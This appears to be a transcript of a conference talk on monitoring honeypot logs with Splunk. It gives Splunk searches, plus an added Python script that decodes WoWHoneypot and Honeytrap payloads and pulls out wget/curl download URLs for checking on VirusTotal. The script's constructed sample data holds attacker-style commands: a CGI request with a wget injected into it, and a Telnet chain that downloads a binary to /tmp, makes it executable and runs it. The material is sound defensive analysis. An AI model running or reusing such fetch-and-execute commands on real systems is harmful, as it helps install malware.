Honeypot Monitoring with Splunk (Splunkによるハニーポット監視.pdf)
sec-chick
September 30, 2018
Transcript
Honeypot Monitoring with Splunk (sec-chick)

WHO AM I • sec-chick (Twitter: @one_sec_chick) • works in a SOC • runs honeypots (WoW Honeypot, Honeytrap)

Setup • WoWHoneypot and Honeytrap run on a VPS, Splunk runs on a local PC • the PC connects to the VPS over SSH to collect the logs

What is Splunk • a platform for collecting, searching and visualising machine data such as logs, used in IT operations and security
> http://www.intellilink.co.jp/pd/products/package/security/splunk.html

Honeypots • WoWHoneypot • Honeytrap

Workflow 1. Copy the honeypot logs over SSH 2. Load them into Splunk 3. Search in Splunk 4. (step text unrecovered) 5. Decode the payloads (Honeytrap stores them hex-encoded)

Honeytrap fields that matter • attack_connection.local_port (which listener the attacker hit) • attack_connection.payload.data_hex (the attacker's data as hex; decode it before reading)

Agenda 1. Docker 2. (item unrecovered) 3. Splunk 4. Suricata

Docker • the honeypots run as Docker containers on the VPS • the logs are written inside the container and have to be copied out to the host • a cron job does the periodic copy so Splunk can pick them up

(diagram) Splunk on the PC ← VPS running WoWHoneypot and Honeytrap as Docker containers

Splunk • decoding: the DECRYPT app adds the atob (base64) and unhex commands needed for the WoWHoneypot and Honeytrap payloads • then grep the decoded text: - search for wget / curl to find download commands - extract the URLs they fetch - submit those URLs to VirusTotal
WoWHoneypot (the raw request is stored base64-encoded as the last field of each access-log line)
| rex field=_raw "\"(?<Method_wow>[^\s]+)\s(?<wow_path>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
| decrypt field="base64_wow" atob emit('base64_wow_decrypted')
| eval decode=urldecode(base64_wow_decrypted)
| rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[\w/:\.\-]+?)\s"
| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[\w/:\.\-]+?)\s"

Honeytrap (the payload is stored as hex in attack_connection.payload.data_hex)
| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[\w/:\.\-]+?)\s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[\w/:\.\-]+?)\s"

Notes: decrypt, atob and unhex come from the DECRYPT app; urldecode is a built-in eval function. The URL regex requires whitespace after the URL, so a URL at the very end of a payload is not captured; use (?:\s|$) in place of the trailing \s if that matters. Because .+ is greedy, a command line with two download URLs yields the last one.
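As an added example (not part of the deck or of the WoWHoneypot/Honeytrap projects), the following Python does offline what the two searches above do in Splunk: base64-decode and URL-decode a WoWHoneypot access-log line, unhex a Honeytrap JSON record, then pull the wget/curl URLs out of the decoded text. The sample records are constructed for this example, the WoWHoneypot column layout it assumes ("METHOD PATH PROTO" status rule base64) is only what the deck's rex implies, and the URL pattern is widened to accept a URL at the end of a payload or before a shell metacharacter, which the deck's regex does not.

```python
"""Offline version of the deck's two Splunk searches: decode a WoWHoneypot
access-log line (base64 + URL-encoding) and a Honeytrap JSON record (hex),
then pull the wget/curl download URLs out of the decoded payload.

The sample records below are constructed for this example. The WoWHoneypot
line follows the column layout the deck's rex command expects
("METHOD PATH PROTO" status rule base64); that layout is an assumption here.
"""
import base64
import json
import re
from urllib.parse import unquote

# The deck's rex uses  wget.+(https?://[\w/:\.\-]+?)\s  which needs whitespace
# after the URL and lets ".+" run across ';' into the next command. This
# pattern stops the search at a command separator and accepts a URL that is
# followed by a shell metacharacter or sits at the end of the payload.
URL_RE = re.compile(r"\b(?:wget|curl)\b[^\n;|&]*?(https?://[^\s'\"<>;|&]+)")

# Columns after the opening quote: METHOD PATH PROTO" status rule base64
WOW_RE = re.compile(r'"(?P<method>\S+)\s(?P<path>\S+)\s\S+\s\S+\s\S+\s(?P<b64>\S+)')


def extract_download_urls(text):
    """URLs handed to wget/curl in a decoded payload, in order of appearance."""
    return URL_RE.findall(text)


def decode_wowhoneypot(line):
    """Base64-decode and URL-decode the raw request stored in an access-log line.
    Returns None for lines that do not match or carry invalid base64."""
    m = WOW_RE.search(line)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return {
        "method": m.group("method"),
        "path": m.group("path"),
        # errors="replace": attackers send non-UTF-8 bytes; do not crash on them
        "request": unquote(raw.decode("utf-8", errors="replace")),
    }


def decode_honeytrap(record):
    """Unhex attack_connection.payload.data_hex from one Honeytrap JSON record."""
    conn = record["attack_connection"]
    try:
        payload = bytes.fromhex(conn["payload"]["data_hex"])
    except (KeyError, ValueError):
        return None
    return {
        "local_port": conn["local_port"],
        "remote_ip": conn.get("remote_ip"),
        "payload": payload.decode("utf-8", errors="replace"),
    }


# --- constructed sample data (not real captures) ---------------------------
_WOW_PATH = ("/cgi-bin/test.cgi?cmd=wget%20http%3A%2F%2F198.51.100.7%2Fbins%2Fx86"
             "%20-O%20%2Ftmp%2Fx86")
_WOW_REQUEST = f"GET {_WOW_PATH} HTTP/1.1\r\nHost: 203.0.113.5\r\nUser-Agent: x\r\n\r\n"
SAMPLE_WOW_LINE = (
    f'[2018-09-30 12:34:56+0900] 198.51.100.23:51234 "GET {_WOW_PATH} HTTP/1.1" 200 1 '
    + base64.b64encode(_WOW_REQUEST.encode()).decode()
)

_HT_PAYLOAD = (b"enable\r\nsh\r\ncd /tmp; wget http://198.51.100.7/bins/mips -O .m; "
               b"chmod +x .m; ./.m\r\n")
SAMPLE_HONEYTRAP_JSON = json.dumps({
    "attack_connection": {
        "local_ip": "203.0.113.5", "local_port": 23,
        "remote_ip": "198.51.100.23", "remote_port": 40122, "protocol": "tcp",
        "payload": {"data_hex": _HT_PAYLOAD.hex(), "length": len(_HT_PAYLOAD)},
    }
})


def run_samples():
    """Decode both constructed records; returns the extracted URLs per source."""
    wow = decode_wowhoneypot(SAMPLE_WOW_LINE)
    ht = decode_honeytrap(json.loads(SAMPLE_HONEYTRAP_JSON))
    return {
        "wowhoneypot": extract_download_urls(wow["request"]),
        "honeytrap": extract_download_urls(ht["payload"]),
    }


if __name__ == "__main__":
    for source, urls in run_samples().items():
        print(source, urls)
```

The WoWHoneypot sample deliberately percent-encodes the whole URL (http%3A%2F%2F...), which is why the URL-decode step has to come before the wget/curl search, exactly as the deck's eval urldecode() does; without it the pattern never sees "http://". The extracted URLs are what would go on to VirusTotal in the deck's workflow.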
Suricata • grep only finds the patterns you already know to look for • idea: run the captured payloads through Suricata signatures instead (left as an open question)

Thanks • @Sec_S_Owl • @cactus_pots • @SugitaMuchi • @soji256 • @morihi_soc (Twitter) • Slack: http://goo.gl/8bLkZA

Summary • Splunk makes it practical to decode and search honeypot logs in one place